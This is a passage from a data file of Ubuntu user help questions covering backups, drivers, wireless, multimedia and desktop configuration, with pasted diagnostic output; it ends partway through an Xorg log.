11892	how to backup boinc	i have boinc manager installed from the ppa , version 6.10.17 , and i am about to upgrade my ubuntu install with a clean install . i would like to know how i can backup my work done on boinc so i do n't loose what i have already done and have to start from scratch again . for example i am running the climate prediction project and it runs for a year or so , i 'm at 30 % work done so i want to backup that 30 % work done . also as an addition to this , can someone advise me the best way to upgrade boinc when new versions are released on their website but are not available on the ppa yet . i know you can install boinc anywhere , but i want to install it to the same place the ppa install does so all my settings and work done is recognised . thanks in advance .
11893	how can i configure ubuntu/gnome to accomodate my keyboard/mouse habits from windows ?	i 've primarily used windows , but recently switched to ubuntu/gnome at work . in my windows setup , the context menu is triggered on the release of the right mouse button ; in my ubuntu/gnome setup , it 's triggered on the press . this is causing me pain because apparently i 've developed a habit in windows of right clicking a bit early , i.e . while still moving the cursor . this has no undesirable side effect in windows , but in my ubuntu/gnome setup , the click immediately brings up the context menu , and the residual movement can sometimes highlight a menu item , and the button release will then act on that selection . in other words , in ubuntu/gnome , where as my intention is just to bring the context menu , i instead accidentally selected some menu item ( usually the top most ) and execute it . how can i prevent this from happening ? can i make ubuntu/gnome bring the context menu on release of right mouse button , the way i 'm used to in windows ? another habit i 've picked up is that i use alt-f , s to save documents . now , some editors ( e.g . eclipse ) are `` smart '' in that it knows if a file does n't need saving , and will disable the save menu item in that case . regardless , alt-f , s would `` work '' in that it 's a no-op ( just like ctrl-s would be ) . that is , even though save is disabled , hitting s would still close the file menu , it just would n't save the document . however , in ubuntu/gnome , when the save menu item is disabled in eclipse , alt-f , s would get `` stuck '' on the file menu . since save is disabled , s would just not do anything , and the file menu stays open . i know i can just try to switch to ctrl-s instead , but can i just configure ubuntu/gnome to let me try alt-f , s even if that particular menu item is disabled ? ( just ignore the action , just like windows does ) . by the way , i 'm open to using another window manager if necessary .
11894	software centre - where did my `` other '' items come from ?	in the software centre , under installed software , i have a number of packages marked as coming form `` other '' . where might these have come from ? the libdvdcss2 entry does not surprise me , but i have no idea where the qt and update-manager entries have come from . as far as i 'm aware i have never installed these packages from a ppa , or installed them manually . update : after taking the screenshot i removed the qt packages because i do n't actually need them . however the output of $ apt-cache policy update-manager is : update-manager : installed : 1:0.142.21 candidate : 1:0.142.21 version table : *** 1:0.142.21 0 100 /var/lib/dpkg/status 1:0.142.20 0 500 http : //gb.archive.ubuntu.com/ubuntu/ maverick-updates/main i386 packages 1:0.142.19 0 500 http : //gb.archive.ubuntu.com/ubuntu/ maverick/main i386 packages i 'm wondering if it could be to do with the maverick-proposed repository .
11897	how to change shotwell keyboard shortcuts ?	i want to edit quickly lots of pictures in shotwell . it already has some shortcuts , like ] for rotate . however , i work on a qwertz keyboard , where ] is typed as altgr + 9 , which means i have to hit two non-home-row buttons with the same hand . it is slow , awkward , and bad for the tendons . i would like to map it to some easy key like r. is there a config file somewhere which i can edit ?
11899	backup evolution mail	i would like to backup my email that i have already downloaded and stored in evolution . i know there is an option in evolution to backup your evolution settings but how can you backup your mail accounts and mail . thank you .
11908	is it safe to shutdown computer without unmounting ntfs partitions ?	sometimes i mount my ntfs drives in ubuntu but forget to unmount them before shutdown . so does ubuntu unmount them before shutdown or do i have to unmount them manually before shutdown ? i am asking this because i have forgot to unmount my ntfs partition many times and when i boot into my windows , windows starts scanning for my disk sometimes . thanks .
11916	how to restore windows xp menu entry in grub ?	i 'm using lubuntu with winxp in dual boot for several weeks . today i 've ran update and grub now does not show winxp menu entry in grub . sudo update-grub did n't found windows . /boot/grub/menu.lst - no such file .
11920	shortcut to a mono .exe file	how can have a shortcut to a compiled mono program ( .exe ) . the execution command in command line is `` mono myprogram.exe ''
11921	how to install mono on a server ?	i 'd like to be able to build and run c # programs on my ubuntu 10.10 server . how do i install mono ? `` sudo apt-get install mono '' does n't work , says `` package mono is not available , but is referred to by another package '' .
11925	a command-line clipboard copy and paste utility ?	in windows i used command-line clipboard copy-and-paste utilities ... pclip.exe and gclip.exe these were unixutils ports for windows ( but they only handled plain text ) . there were a couple of other native windows utils which could write/extracy any format . i 've looked for something similar in synaptic package manager , but i ca n't find anything . is there something there , that i 've missed ? ... or maybe this is available in bash scripting ? the type of utility i 'd like will be able to read/write via std-in/std-out or file-in/file-out , and handle unicode/rich-text/picture/etc clipboard formats ... late edit : nb : i 'm not after a clipboard manager .
11931	are there alternatives after the official support time stops ?	i 'm currently running ubuntu 8.10 on a system . it works very good but i did a lot of tuning ( it 's a server ) to get it working . i 'm aware that i need to upgrade to a new lts version of ubuntu if i have time . but until i have time for that , are there alternative ways to get some ( albeit unofficial ) security updates from a secondary source ?
11932	how can you keep a record of notifications ?	i 'm using radio-tray and i would like to keep a list of the tracks which get played and i was wondering if it was possible to do this by keeping a record of the ubuntu notifications ?
11934	why does removing firefox install another browser ?	i want to remove firefox ( with sudo apt-get purge firefox* ) but without installing the epiphany browser . how to do it ? ps : i want to remove firefox becouse i want to use and only use google-chrome to be my default web browser .
11947	how do i connect to a wireless network using a tp-link tl-wn321g usb adapter	i 'm having troubles connecting to the internet with my new wireless usb adapter . although i can see via the networkmanager all the wireless networks around me , it fails to connect to any of them . i 'm using linux mint 10 rc . i 've blacklisted the rt2500usb driver because it was loaded simultaneously with rt73usb . here is the output of lsmod : nls_iso8859_1 3261 1 nls_cp437 4931 1 vfat 9201 1 fat 48240 1 vfat usb_storage 40172 1 nls_utf8 1069 1 isofs 30022 1 aes_i586 7280 0 aes_generic 26875 1 aes_i586 binfmt_misc 6599 1 dm_crypt 11385 0 arc4 1165 2 snd_intel8x0 25632 2 snd_ac97_codec 99227 1 snd_intel8x0 ac97_bus 1014 1 snd_ac97_codec snd_pcm 71475 2 snd_intel8x0 , snd_ac97_codec rt73usb 22442 0 snd_seq_midi 4588 0 crc_itu_t 1383 1 rt73usb rt2x00usb 9779 1 rt73usb rt2x00lib 27275 2 rt73usb , rt2x00usb snd_rawmidi 17783 1 snd_seq_midi led_class 2633 1 rt2x00lib mac80211 231541 2 rt2x00usb , rt2x00lib snd_seq_midi_event 6047 1 snd_seq_midi snd_seq 47174 2 snd_seq_midi , snd_seq_midi_event snd_timer 19067 2 snd_pcm , snd_seq snd_seq_device 5744 3 snd_seq_midi , snd_rawmidi , snd_seq ppdev 5556 0 cfg80211 144470 2 rt2x00lib , mac80211 parport_pc 26058 1 snd 49006 11 snd_intel8x0 , snd_ac97_codec , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device shpchp 29886 0 soundcore 880 1 snd snd_page_alloc 7120 2 snd_intel8x0 , snd_pcm lp 7342 0 parport 31492 3 ppdev , parport_pc , lp dm_raid45 81721 0 xor 15136 1 dm_raid45 btrfs 489451 0 zlib_deflate 19266 1 btrfs crc32c 2531 1 libcrc32c 887 1 btrfs usbhid 36882 0 hid 67742 1 usbhid i915 290938 3 drm_kms_helper 30200 1 i915 drm 168054 4 i915 , drm_kms_helper floppy 54311 0 e1000 97525 0 intel_agp 26360 2 i915 i2c_algo_bit 5168 1 i915 video 18712 1 i915 output 1883 1 video agpgart 32011 2 drm , intel_agp nls_iso8859_1 3261 1 nls_cp437 4931 1 vfat 9201 1 fat 48240 1 vfat usb_storage 40172 1 nls_utf8 1069 1 isofs 30022 1 aes_i586 7280 0 aes_generic 26875 1 aes_i586 binfmt_misc 6599 1 dm_crypt 11385 0 arc4 1165 2 snd_intel8x0 25632 2 snd_ac97_codec 99227 1 snd_intel8x0 ac97_bus 1014 1 snd_ac97_codec snd_pcm 71475 2 snd_intel8x0 , snd_ac97_codec rt73usb 22442 0 snd_seq_midi 4588 0 crc_itu_t 1383 1 rt73usb rt2x00usb 9779 1 rt73usb rt2x00lib 27275 2 rt73usb , rt2x00usb snd_rawmidi 17783 1 snd_seq_midi led_class 2633 1 rt2x00lib mac80211 231541 2 rt2x00usb , rt2x00lib snd_seq_midi_event 6047 1 snd_seq_midi snd_seq 47174 2 snd_seq_midi , snd_seq_midi_event snd_timer 19067 2 snd_pcm , snd_seq snd_seq_device 5744 3 snd_seq_midi , snd_rawmidi , snd_seq ppdev 5556 0 cfg80211 144470 2 rt2x00lib , mac80211 parport_pc 26058 1 snd 49006 11 snd_intel8x0 , snd_ac97_codec , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device shpchp 29886 0 soundcore 880 1 snd snd_page_alloc 7120 2 snd_intel8x0 , snd_pcm lp 7342 0 parport 31492 3 ppdev , parport_pc , lp dm_raid45 81721 0 xor 15136 1 dm_raid45 btrfs 489451 0 zlib_deflate 19266 1 btrfs crc32c 2531 1 libcrc32c 887 1 btrfs usbhid 36882 0 hid 67742 1 usbhid i915 290938 3 drm_kms_helper 30200 1 i915 drm 168054 4 i915 , drm_kms_helper floppy 54311 0 e1000 97525 0 intel_agp 26360 2 i915 i2c_algo_bit 5168 1 i915 video 18712 1 i915 output 1883 1 video agpgart 32011 2 drm , intel_agp output of ifconfig : eth0 link encap : ethernet hwaddr 00:0d:60 : ae:4f : df up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:132 errors:0 dropped:0 overruns:0 frame:0 tx packets:132 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:9120 ( 9.1 kb ) tx bytes:9120 ( 9.1 kb ) wlan0 link encap : ethernet hwaddr d8:5d:4c:89:7c : d8 inet6 addr : fe80 : :da5d:4cff : fe89:7cd8/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:58 errors:0 dropped:0 overruns:0 frame:0 tx packets:26 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:17137 ( 17.1 kb ) tx bytes:6535 ( 6.5 kb ) output of lshw -c network : warning : you should run this program as super-user . *-network description : ethernet interface product : 82541ei gigabit ethernet controller vendor : intel corporation physical id : b bus info : pci @ 0000:03:0b.0 logical name : eth0 version : 00 serial : 00:0d:60 : ae:4f : df width : 32 bits clock : 66mhz capabilities : bus_master cap_list ethernet physical configuration : broadcast=yes driver=e1000 driverversion=7.3.21-k6-napi firmware=n/a latency=52 mingnt=255 multicast=yes resources : irq:16 memory : e8100000-e811ffff ioport:2000 ( size=64 ) *-network description : wireless interface physical id : 2 bus info : usb @ 1:7 logical name : wlan0 serial : d8:5d:4c:89:7c : d8 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt73usb driverversion=2.6.35-22-generic firmware=n/a multicast=yes wireless=ieee 802.11bg the output of cat /etc/network/interfaces auto lo iface lo inet loopback the output of iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed frequency:2.437 ghz access point : not-associated tx-power=9 dbm retry long limit:7 rts thr : off fragment thr : off power management : on the output of lspci : 00:00.0 host bridge : intel corporation 82865g/pe/p dram controller/host-hub interface ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82865g integrated graphics controller ( rev 02 ) 00:06.0 system peripheral : intel corporation 82865g/pe/p processor to i/o memory interface ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev c2 ) 00:1f.0 isa bridge : intel corporation 82801eb/er ( ich5/ich5r ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801eb/er ( ich5/ich5r ) ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation 82801eb/er ( ich5/ich5r ) smbus controller ( rev 02 ) 00:1f.5 multimedia audio controller : intel corporation 82801eb/er ( ich5/ich5r ) ac'97 audio controller ( rev 02 ) 03:0b.0 ethernet controller : intel corporation 82541ei gigabit ethernet controller as requested here is the output of lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 002 : id 04b3:3108 ibm corp. 800dpi optical mouse w/ scroll point bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 090c:1000 feiya technology corp . flash drive bus 001 device 003 : id 148f:2573 ralink technology , corp. rt2501/rt2573 wireless adapter bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub can somebody help me solve this problem ? thanks in advance and best regards ! as suggested by outofstep , i downloaded the rt2501usb ( rt73 : rt2571w/rt2573/rt2671 ) firmware from http : //www.ralinktech.com/en/04_support/support.php ? sn=501 and copied the file rt73.bin to /lib/firmware unplugged the usb adapter , plugged it in again but to no avail . a reboot of the computer did n't help either . but thanks anyway . this is the output of dmesg | grep rt73 [ 15.540677 ] registered led device : rt73usb-phy0 : :radio [ 15.540720 ] registered led device : rt73usb-phy0 : :assoc [ 15.540763 ] registered led device : rt73usb-phy0 : :quality [ 15.541515 ] usbcore : registered new interface driver rt73usb thanks for the support so far , outofstep and hhlp .
11951	booting hangs at `` checking battery ... . ''	ubuntu 9.04 ( jaunty jacklope version ) installation guidance requested . i am a quite new user ( more proper to say “..a learner” ) of ubuntu . i am a sr. citizen . please guide and help me in the matter mentioned below . my system is a pentium iii , 804 mhz processor , asus cusl-2 mother board , 512mb ram sd two hard-disks 80 gb & 20 gb . i installed ubuntu 9.04 on a separate hd of 20 gb using chip 's live dvd to install . it is jaunty jacklope version . it is successfully installed . on starting the system , it also displayes booting options as under : ubuntu 9.04 kernel 2.6.28 – 11 genuine ubuntu 9.04 kernel 2.6.28 – 11 genuine ( recovery mode ) ubuntu 9.04 memtest86+ other operating system : microsoft windows xp professional if win.xp is selected , it starts . but if ubuntu 9.04 option is given , it starts booting , checks all parameters and gives [ ok ] to all but stops at `` checking battery ... . '' it stops and after 2 to 3 flickers the monitor screen becomes blank/dark ... nothing comes on it . i have tried with all the three options as displayed above . the result is the same- i.e . nil . please help me in the matter and provide guidance in a very simple detailed way and oblige . thanking you in anticipation .
11952	upgraded to 10.10 but desktop shell did not change	i upgraded from 10.04 to 10.10 but my desktop shell did not change to unity . how can i change it myself to check it out ( and change back if i decide to ) ?
11955	why does my cpu usage keep spiking ?	my cpu usage keeps spiking a lot . i can be sitting on my desktop and my cpu usage will go up to around 90 % , according to conky . here is the output of top : pid user pr ni virt res shr s % cpu % mem time+ command 3183 thomas 25 5 868m 66m 19m s 12 1.7 1:14.99 chromium-browse 1151 root 20 0 149m 45m 19m s 11 1.1 8:07.03 xorg 5739 thomas 20 0 190m 19m 12m r 6 0.5 0:00.19 nvidia-settings 1891 thomas 20 0 134m 34m 4436 s 4 0.9 1:35.87 beam.smp 4840 thomas 20 0 433m 18m 12m s 3 0.5 0:01.13 gnome-terminal 23 root 20 0 0 0 0 s 1 0.0 0:46.66 kacpid and right now my cpu usage is around 70 % . it 's as if there is some malicious process or something hidden away just eating up my cpu usage . if it helps to know , i 'm running a core 2 duo with the nvidia drivers installed , version 260.19.06 .
11956	users disappear from options menu when given uids under 1000	i wanted to stop particular user names appearing in the list of names at the log in screen . i remembered reading that this could be achieved by changing the user id of the account to something less than 1000 ( i think i made it 990 ) . so i did this . that worked fine , but now when i wanted to change it back , the name is not appearing in the list of user accounts in the users and groups menu under administration . how do i modify the phantom account ?
11957	iptables rule to force all browsers to use proxy	i have installed squid as my proxy server in ubuntu 10.04 standalone system which has a single nic . why i have installed squid in a standalone system is because of my friends who uses my system to browse sites and download files . so i have installed squid to block porn sites and downloads . but they simply bypass the proxy settings by disabling it in browser..i know there is some way to force all browsers to go through proxy using iptables . but how ? i have searched everywhere for the answer but cant get the right one yet . can somebody help me ?
11962	installing python 2.4 for development ?	i have a vm of ubuntu 10.10 x86 , and i need to build a mercurial installation against python 2.4 . i have to do this because the web host i am working on has python 2.4 as the latest copy of python . in ubuntu 9.10 it was a simple as editing two make files to target the python2.4 executable , and doing a make local against it . however since ubuntu 10.10 does not have 2.4 i need to install the base , libraries , and dev tools for 2.4 . how do i go about doing this ? i was n't able to find a good walk-through via google .
11965	where can i find documentation about the gtk+ aurora engine	i ca n't find any documentation about aurora .
11976	how to create ram drive ?	how do i create ram drive under ubuntu . and would he automounted at startup ?
11986	banshee with enabled clutterflow plugin crashes	now i ca n't run banshee , because of banshee automatically quit after some time . question : where is located banshee configs ? can i delete them to reset settings ? ? ?
11988	enable autologin for xvnc/xdmcp ?	version : ubuntu 9.10 how i do to enable automatic login in xvnc/xdmcp ? im in the process of setting up a xvnc kiosk , which will be a terminal server hosting multiple kiosk machines under separate sessions . /etc/gdm/custom.conf : [ security ] allowremoteautologin=true [ xdmcp ] enable=true displaysperhost=100 maxsessions=100 [ daemon ] automaticloginenable=true automaticlogin=kiosk /etc/xinetd.conf : defaults { instances = 20 } includedir /etc/xinetd.d /etc/xinetd.d/xvncserver : service xvncserver { socket_type = stream protocol = tcp wait = no user = kiosk server = /usr/bin/xvnc4 server_args = -inetd -query localhost -geometry 640x480 -depth 16 -securitytypes=none } what i want , is that when someone connects with a vnc client to the machine , the user who connect should immediately get logged in as the `` kiosk '' user without being asked for password or something else , just straight into as the user `` kiosk '' . as it is now , the user just gets a login screen asking for username/password . theres no problem running multiple sessions as the same user . i have tested it , all sessions are concurrent and does not affect each other , so theres no need to have a separate kiosk account for each kiosk machine .
11989	how to convert mpg4 video ?	what mpg4 converters are available for ubuntu 10.10 ? i have tried all that are in the software centre and none will work . i have a flip camera and it records in mpg4 , which i have trouble with on linux . i do n't mind whether the converters are graphical or command line . thanks for all the help with this , finally got something to work , getting help is why i switched to ubuntu . thanks everybody
11990	how do i ban a wifi network in network manager ?	my wifi connection drops sometimes and , for some reason , network manager attempts to connect to my neighbor 's network , which requires a password that i do n't know . the network in question is not listed in the `` edit connections ... '' dialog and i can find no reference to it in any configuration file , but still the password dialog pops up every time my main connection drops . is there a way to blacklist a wireless network so that the network manager will never attempt to connect to it ? or , equivalently , how can i remove the configuration data that causes the network manager to attempt to connect to this particular network ?
11993	how do i install bcm4312 wireless drivers ?	completely new to ubuntu . how do i add wireless driver for my laptop ? i am running a dell xps m1330 . right now its acts as if i dont have a wi-fi card . : ~ $ lspci 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:01.0 pci bridge : intel corporation mobile pm965/gm965/gl960 pci express root port ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 02 ) 00:1c.5 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 6 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hem ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) sata ahci controller ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 01:00.0 vga compatible controller : nvidia corporation g86 [ geforce 8400m gs ] ( rev a1 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 12 ) 09:00.0 ethernet controller : broadcom corporation netlink bcm5906m fast ethernet pci express ( rev 02 ) 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 )
11997	how do i set environment variables in an emacs session launched from gnome panel ?	my .bash_env file sets several environment variables , including path and email , but in an emacs session launched from the gnome panel ( command : `` /usr/bin/emacs23 % f '' ) these variables do not have the expected values . i 've run into this problem before ( see this blog post ) . i fixed it then by sourcing .bash_env in my .xsession file . obviously , this is no longer working . the variables are set properly if i manually launch emacs from a terminal . oddly , they are n't set if i change the panel launcher to execute emacs in a terminal ( i would think this would start bash before starting emacs ) . how can i make sure the regular bash environment is set up for the emacs session ?
12009	solving permission problems when using external ext4 hard disk with multiple linux installs	hello i have a external hard drive and since i only use ubuntu and fedora i decide to format my hard drive to ext4 everything is fine . the problem is when i mount the drive i need to change the permission so i can read and write what kind of permission i should use ? adm my user name ?
12014	meta-package dependencies	i 've got a pure vanilla lucid desktop installation on a severely ram limited laptop ( with a slow drive for extra happy swapping ) . i 'm trying to remove packages that snuck in on ubuntu-desktop which i know i 'll never use . for example apt-get remove -- simulate '.*openoffice . * ' worked without a problem , but did n't save me any ram , either . so i 've looked to the things that are actually running , and as the box does n't have bluetooth , apt-get remove -- simulate gnome-bluetooth seemed reasonable but took package gnome-user-share along with it . but that 's okay . however , if i do n't want printing capabilities , apt-get remove -- simulate cups wants to take out ubuntu-desktop which is a metapackage which depends on literally 100 essential sub-systems ( e.g . nautilus and gnome-panel among others ) . of course , removing cups wo n't cause the removal of nautilus , but it does seem like it will leave my apt package state confused . am i missing some deep ubuntu mystique or would removing cups be bad ? ( i put the -- simulate flag in my examples lest someone cut-paste-cry ) .
12018	dark video with skype	when i use skype the video looks really dark ( both to me and the other person ) . but it does n't seem to be a problem with the webcam itself , because with cheese the image looks fine .
12020	how can i make the default sound input for skype persistent ?	in order for skype to work with the mic in my webcam , i need to change the sound preferences - > input to `` 0825 analog mono '' ( default is `` internal audio analog stereo '' ) . however whenever i reboot this gets reset . how can i make it the default ?
12021	is there a gmail drive ?	is there the gdrive in ubuntu ? like windows have . or similar
12031	where can i find the downloaded videos on my hardisk after i 've watched it in a web browser ?	where can i find the downloaded videos on my hardisk after i 've watched it in a web browser ?
12038	add an audio file to and mkv video	i 'm quite new to multimedia things , i 'm trying to find a way to make nice screencasts , i 've already been able to capture my desktop with ffmpeg : $ ffmpeg -f alsa -ac 2 -i hw:0,0 -f x11grab -r 30 -s $ ( xwininfo -root | grep 'geometry ' | awk ' { print $ 2 ; } ' ) -i :0.0 -acodec pcm_s16le -vcodec libx264 -vpre lossless_ultrafast -threads 0 -y out.mkv it works pretty nice , but i 'd like to add music in the background , if i add it with mencoder : mencoder -ovc copy -oac mix -audiofile track.mp3 out.mkv -o out.mp4 it delete the video sound , i do n't want to replace it , i want to add music to my explanation , any ideas ?
12041	how can i navigate to /tmp ?	i want to find the downloaded videos on my hardisk .
12043	hd6870 segmentation fault with fglrx	installing a new system . intel core i7 870 socket 1156 2.93ghz tray gigabyte ga-p55a-ud3 p55 chipset 8gb transcend ddr3 1333mhz ( 4 x 2gb ) sapphire ati radeon 6870 1gb gddr5 ubuntu 10.10 64bit after installing the proprietary fglrx display adapter driver using the `` additional drivers '' wizard and rebooting the system i 'm getting the following segmentation fault in xorg log . the system hangs . to get the system back into operational state i had to use feed grub with the `` single '' parameter , to force ubuntu into recovery mode , which in turn allowed me to boot in fail safe graphical mode ... maxim @ bolt : ~ $ cat /var/log/xorg.99.log [ 49.448 ] x.org x server 1.9.0 release date : 2010-08-20 [ 49.448 ] x protocol version 11 , revision 0 [ 49.448 ] build operating system : linux 2.6.24-27-server x86_64 ubuntu [ 49.448 ] current operating system : linux bolt 2.6.35-22-generic # 33-ubuntu smp sun sep 19 20:32:27 utc 2010 x86_64 [ 49.448 ] kernel command line : boot_image=/boot/vmlinuz-2.6.35-22-generic root=uuid=948c9620-0ef2-4807-8e8d-edb26751723c ro quiet splash single [ 49.448 ] build date : 16 september 2010 06:18:41pm [ 49.448 ] xorg-server 2:1.9.0-0ubuntu7 ( for technical support please see http : //www.ubuntu.com/support ) [ 49.448 ] current version of pixman : 0.18.4 [ 49.448 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 49.448 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 49.448 ] ( == ) log file : `` /var/log/xorg.99.log '' , time : mon nov 8 01:44:58 2010 [ 49.448 ] ( ii ) loader magic : 0x7d0200 [ 49.448 ] ( ii ) module abi versions : [ 49.448 ] x.org ansi c emulation : 0.4 [ 49.448 ] x.org video driver : 8.0 [ 49.448 ] x.org xinput driver : 11.0 [ 49.448 ] x.org server extension : 4.0 [ 49.449 ] ( -- ) pci : * ( 0:1:0:0 ) 1002:6738:1002:00d0 rev 0 , mem @ 0xe0000000/268435456 , 0xfbcc0000/131072 , i/o @ 0x0000ce00/256 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 49.449 ] list of video drivers : [ 49.449 ] apm [ 49.449 ] neomagic [ 49.449 ] openchrome [ 49.449 ] s3virge [ 49.449 ] r128 [ 49.449 ] vmwlegacy [ 49.449 ] nouveau [ 49.449 ] cirrus [ 49.449 ] ark [ 49.449 ] radeon [ 49.449 ] tseng [ 49.449 ] savage [ 49.449 ] rendition [ 49.449 ] chips [ 49.450 ] voodoo [ 49.450 ] mga [ 49.450 ] trident [ 49.450 ] nv [ 49.450 ] intel [ 49.450 ] i128 [ 49.450 ] siliconmotion [ 49.450 ] mach64 [ 49.450 ] vmware [ 49.450 ] ati [ 49.450 ] sis [ 49.450 ] sisusb [ 49.450 ] fglrx [ 49.450 ] s3 [ 49.450 ] tdfx [ 49.450 ] fbdev [ 49.450 ] vesa [ 49.450 ] ( ii ) loadmodule : `` apm '' [ 49.450 ] ( ii ) loading /usr/lib/xorg/modules/drivers/apm_drv.so [ 49.455 ] ( ii ) module apm : vendor= '' x.org foundation '' [ 49.455 ] compiled for 1.8.99.905 , module version = 1.2.3 [ 49.455 ] module class : x.org video driver [ 49.455 ] abi class : x.org video driver , version 8.0 [ 49.456 ] ( ii ) loadmodule : `` neomagic '' [ 49.456 ] ( ii ) loading /usr/lib/xorg/modules/drivers/neomagic_drv.so [ 49.466 ] ( ii ) module neomagic : vendor= '' x.org foundation '' [ 49.466 ] compiled for 1.8.99.905 , module version = 1.2.4 [ 49.466 ] module class : x.org video driver [ 49.466 ] abi class : x.org video driver , version 8.0 [ 49.466 ] ( ii ) loadmodule : `` openchrome '' [ 49.466 ] ( ii ) loading /usr/lib/xorg/modules/drivers/openchrome_drv.so [ 49.474 ] ( ii ) module openchrome : vendor= '' http : //openchrome.org/ '' [ 49.474 ] compiled for 1.8.99.905 , module version = 0.2.904 [ 49.474 ] module class : x.org video driver [ 49.474 ] abi class : x.org video driver , version 8.0 [ 49.474 ] ( ii ) loadmodule : `` s3virge '' [ 49.474 ] ( ii ) loading /usr/lib/xorg/modules/drivers/s3virge_drv.so [ 49.493 ] ( ii ) module s3virge : vendor= '' x.org foundation '' [ 49.493 ] compiled for 1.8.99.905 , module version = 1.10.4 [ 49.493 ] module class : x.org video driver [ 49.493 ] abi class : x.org video driver , version 8.0 [ 49.493 ] ( ii ) loadmodule : `` r128 '' [ 49.493 ] ( ii ) loading /usr/lib/xorg/modules/drivers/r128_drv.so [ 49.495 ] ( ii ) module r128 : vendor= '' x.org foundation '' [ 49.495 ] compiled for 1.8.99.905 , module version = 6.8.1 [ 49.495 ] module class : x.org video driver [ 49.495 ] abi class : x.org video driver , version 8.0 [ 49.495 ] ( ii ) loadmodule : `` vmwlegacy '' [ 49.495 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vmwlegacy_drv.so [ 49.505 ] ( ii ) module vmwlegacy : vendor= '' x.org foundation '' [ 49.505 ] compiled for 1.8.99.905 , module version = 11.0.1 [ 49.505 ] module class : x.org video driver [ 49.505 ] abi class : x.org video driver , version 8.0 [ 49.505 ] ( ii ) loadmodule : `` nouveau '' [ 49.505 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 49.506 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 49.506 ] compiled for 1.8.99.905 , module version = 0.0.16 [ 49.506 ] module class : x.org video driver [ 49.506 ] abi class : x.org video driver , version 8.0 [ 49.506 ] ( ii ) loadmodule : `` cirrus '' [ 49.506 ] ( ii ) loading /usr/lib/xorg/modules/drivers/cirrus_drv.so [ 49.507 ] ( ii ) module cirrus : vendor= '' x.org foundation '' 